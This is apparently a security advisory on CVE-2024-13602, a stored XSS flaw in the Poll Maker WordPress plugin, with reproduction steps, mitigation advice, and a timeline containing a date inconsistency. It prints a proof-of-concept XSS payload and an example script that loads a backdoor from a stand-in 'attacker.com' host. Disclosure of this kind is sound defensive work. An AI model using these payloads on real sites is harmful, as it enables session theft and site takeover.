Cross-Site Scripting (XSS) vulnerabilities remain one of the most persistent security threats in web applications, including WordPress plugins. The vulnerability CVE-2024-13602 was discovered in the “Poll Maker” WordPress plugin, allowing an attacker to inject malicious JavaScript code into the plugin’s redirect settings. This stored XSS vulnerability can be leveraged to execute arbitrary JavaScript, potentially leading to full account takeovers or JavaScript-based backdoor creation.
| CVE | CVE-2024-13602 |
| Plugin | Poll Maker < 5.5.4 |
| Critical | Medium |
| All Time | 515 079 |
| Active installations | 7 000+ |
| Publicly Published | February 24, 2025 |
| Last Updated | February 24, 2025 |
| Researcher | Artyom Krugov |
| OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
| PoC | Yes |
| Exploit | No |
| Reference | https://wpscan.com/vulnerability/05d5010b-94eb-4fd3-b962-e2a16c032b71/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13602 |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| November 26, 2024 | Plugin testing and vulnerability detection in the PollMaker have been completed |
| November 26, 2024 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| February 24, 2024 | Registered CVE-2024-13602 |
Discovery of the Vulnerability
The vulnerability was identified in the “Answer Redirection” feature of the Poll Maker plugin. This feature allows administrators to define custom redirection URLs for poll answers, but it does not properly sanitize user input. By injecting a specially crafted payload into the redirect URL field, an attacker can execute arbitrary JavaScript code when a user interacts with the poll.
Steps to Reproduce:
- Navigate to the “Poll Maker” plugin tab in WordPress.
- Create a new poll.
- In the “Options Settings” section, locate the “Answer Redirection” column and enable it.
- Insert a malicious XSS payload into the “Redirect URL” column.
- Publish the poll and insert its shortcode into a WordPress post or page.
- When a user interacts with the poll, the JavaScript payload is executed in their browser.
Proof-of-Concept (PoC) Payload:
123123"asdads=''"><script></script><img src=x onerror=alert(document.domain)>Understanding of XSS attack’s
Stored XSS occurs when malicious scripts are permanently stored on the target server (e.g., in the database) and later executed by users. Unlike Reflected XSS, which requires user interaction with a crafted link, Stored XSS can impact all users who view or interact with the compromised content.
Common Attack Scenarios in WordPress:
- Malicious Admin Takeover: Injecting JavaScript into administrative pages to steal session cookies or perform actions as an administrator.
- Credential Theft: Capturing login credentials via a fake login form injected into a vulnerable input field.
- JavaScript Backdoor Creation: Modifying existing JavaScript files to create persistent access or control over the site.
- Defacement and Phishing: Injecting malicious content to deceive users into entering sensitive data.
Exploiting the XSS Vulnerability
Once a successful XSS payload is injected into the “Poll Maker” plugin’s settings, attackers can exploit it in various ways:
POC:
<script> document.write('<script src="http://attacker.com/backdoor.js"></script>'); </script>____
This script dynamically loads a remote JavaScript file, allowing an attacker to modify website behavior or inject additional payloads.
Recommendations for Improved Security
To mitigate the risks associated with CVE-2024-13602, the following security measures should be implemented:
Immediate Fixes:
- Update the Plugin: Check for security patches from the Poll Maker plugin developers and apply updates immediately.
- Sanitize User Input: Ensure all input fields, especially those that accept URLs, are properly sanitized and escaped before being stored in the database.
- Use Content Security Policy (CSP): Implement a strong CSP header to restrict the execution of untrusted scripts.
- Enable WordPress Security Plugins: Utilize security plugins like Wordfence or Sucuri to detect and block XSS attempts.
Long-Term Security Practices:
- Regular Security Audits: Conduct regular security assessments to identify and patch vulnerabilities before attackers exploit them.
- Limit User Privileges: Follow the principle of least privilege (PoLP) by ensuring only necessary users have access to high-risk features.
- Educate Users and Admins: Train website administrators on security best practices to recognize potential threats.
To prevent this type of attacks vendor used our methods of prevention.
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-13602, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
ARTYOM K.
